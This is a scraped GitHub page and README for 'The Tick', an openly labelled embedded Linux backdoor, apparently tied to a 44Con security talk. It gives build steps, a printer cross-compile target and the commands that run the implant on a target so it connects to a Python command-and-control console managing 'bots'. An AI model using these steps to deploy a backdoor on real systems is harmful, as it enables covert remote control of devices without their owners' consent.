Skip to content
A simple embedded Linux backdoor.
Python C Makefile C++
Branch: master
Clone or download
Type Name Latest commit message Commit time
Failed to load latest commit information.
deps/lexmark-cx310dn Initial commit. Sep 23, 2019
doc Added TOC + better screenshots Sep 27, 2019
src Initial commit. Sep 23, 2019
.gitignore Initial commit. Sep 23, 2019
LICENSE Added TOC + better screenshots Sep 27, 2019
requirements.txt Initial commit. Sep 23, 2019 Initial commit. Sep 23, 2019

The Tick

A simple embedded Linux backdoor.

Screenshot 1


The Tick depends only on libcurl, so make sure you have the corresponding development package. For example on Debian based distributions you would do the following:

sudo apt-get install libcurl-dev

Once the dependencies are installed just run the makefile:

cd src
make clean

Once the "make" command has run to completion, the compiled binary can be found at the "bin" folder. This is the binary you want to run on your target machine to control it remotely.

When cross-compiling for supported platforms, the dependency resolution and compilation is done automatically for you. Currently the only supported cross-compiling platform is the Lexmark CX310DN printer, but more devices will be added later. Consult the makefile for more details.

The command and control console is written in Python and therefore needs not be compiled.


Obtaining persistence on the backdoor will depend heavily on the target platform, and therefore is not documented here.

On the target machine, run the backdoor binary with the following arguments:

./ticksvc ADDR PORT

Where "ADDR" and "PORT" must be replaced by the IP address and port where the command and console will be listening. The default port is 5555.

The command and control console requires no installation, but may have unresolved dependencies. Run the following command to ensure all dependencies are properly installed (note this does not need sudo):

pip install --upgrade -r requirements.txt

In most Linux desktop environments the following "Tick.desktop" file will create an icon you can double click to run the console:

[Desktop Entry]
Name=The Tick
GenericName=The Tick
Comment=An embedded Linux backdoor

The exact location for the Tick.desktop file may vary across Linux distributions but generally placing it in the desktop should work. Make sure to edit the path to wherever you downloaded The Tick (/opt/thetick in the above example).


To run the backdoor binary on the target platform, set the control server hostname and port as command line options. For example:

./ticksvc 5555

At the control server, you may want to run the console inside a GNU screen instance or similar:

sudo apt-get install screen
screen -S thetick ./

That way you can detach from the console by pressing Control+A followed by D. You can return to the console later like this:

screen -r thetick

The console will let you know when a new bot connects to it. Use the "bots" command to show the currently connected bots, and the "use" command will select a bot to work with. The "help" command shows the user manual.

Here are a few screenshots illustrating what the console is capable of:

Screenshot 2

Screenshot 3


The Tick has been referenced in the following 44Con presentation by Daniel Romero and Mario Rivas:

You can’t perform that action at this time.